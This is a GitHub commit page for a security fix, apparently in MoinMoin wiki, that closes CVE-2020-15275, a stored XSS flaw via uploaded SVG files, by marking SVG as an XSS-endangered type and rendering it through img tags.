Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
security: fix stored XSS vulnerability via SVG attachment
Fixes CVE-2020-15275. An attacker with write permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user's browser when the user is viewing that SVG file on the wiki. Components of this fix: A) add svg mimetype to the XSS endangered types SVG can contain javascript and lead to stored XSS. Seems like the only exception to that is when using it in an <img> tag as src. B) add svg+xml to the browser supported image types This triggers that moin will use the <img> tag for SVGs. <img> does not have the SVG XSS issue. Credits: This vulnerability was discovered by: Catarina Leite from the Checkmarx SCA AppSec team
- Loading branch information